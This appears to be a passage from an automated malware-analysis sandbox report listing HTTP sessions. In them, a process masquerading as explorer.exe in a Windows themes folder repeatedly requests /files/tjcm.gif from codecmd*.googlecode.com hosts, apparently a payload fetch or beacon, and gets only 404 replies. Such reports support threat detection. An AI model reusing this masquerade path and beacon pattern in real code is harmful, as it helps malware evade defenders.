14 | 192.168.2.4 | 49750 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:40.309391975 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:41.025130033 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:40 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:41.025161028 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49751 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:42.487508059 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:43.220982075 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:43 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:43.221009970 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49752 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:44.554965973 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:45.267776012 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:45 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:45.267802000 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49753 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:46.783688068 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:47.504919052 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:47 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:47.504941940 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49754 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:48.602169037 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:17:49.311116934 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:49 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:49.311146975 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49755 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:50.419233084 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:17:51.129062891 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:51 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:51.129125118 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49756 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:52.337215900 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:17:53.101898909 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:53 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:53.101923943 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49757 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:54.070306063 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:17:54.780528069 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:54 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:54.780591011 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49758 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:55.696208000 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:17:56.431293964 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:56 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:56.431333065 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                          Jan 13, 2025 13:17:56.431345940 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
23          192.168.2.4  49759        64.233.167.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:17:57.528532982 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd03.googlecode.com
    Connection: Keep-Alive
Jan 13, 2025 13:17:58.251730919 CET  1236               IN         HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1575
    Date: Mon, 13 Jan 2025 12:17:58 GMT
Jan 13, 2025 13:17:58.251763105 CET  494                IN


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
24          192.168.2.4  49760        66.102.1.82     80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:17:59.216964006 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd01.googlecode.com
    Connection: Keep-Alive
Jan 13, 2025 13:17:59.925331116 CET  1236               IN         HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1575
    Date: Mon, 13 Jan 2025 12:17:59 GMT
Jan 13, 2025 13:17:59.925390005 CET  494                IN


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
25          192.168.2.4  49762        74.125.133.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:18:00.980176926 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd02.googlecode.com
    Connection: Keep-Alive
Jan 13, 2025 13:18:01.689667940 CET  1236               IN         HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1575
    Date: Mon, 13 Jan 2025 12:18:01 GMT
Jan 13, 2025 13:18:01.689738035 CET  494                IN


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
26          192.168.2.4  49769        64.233.167.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:18:02.478761911 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd03.googlecode.com
    Connection: Keep-Alive
Jan 13, 2025 13:18:03.187700033 CET  1236               IN         HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1575
    Date: Mon, 13 Jan 2025 12:18:03 GMT
Jan 13, 2025 13:18:03.187736034 CET  494                IN


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
27          192.168.2.4  49780        66.102.1.82     80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:18:03.990397930 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd01.googlecode.com
    Connection: Keep-Alive
Jan 13, 2025 13:18:04.694113970 CET  1236               IN         HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1575
    Date: Mon, 13 Jan 2025 12:18:04 GMT
Jan 13, 2025 13:18:04.694133043 CET  494                IN


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          28192.168.2.44979174.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:05.587814093 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:06.314169884 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:06 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:06.314229965 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49797 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:06.964760065 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:07.674227953 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:07 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:07.674278021 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49808 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:08.468693972 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:09.213392973 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:09 GMT
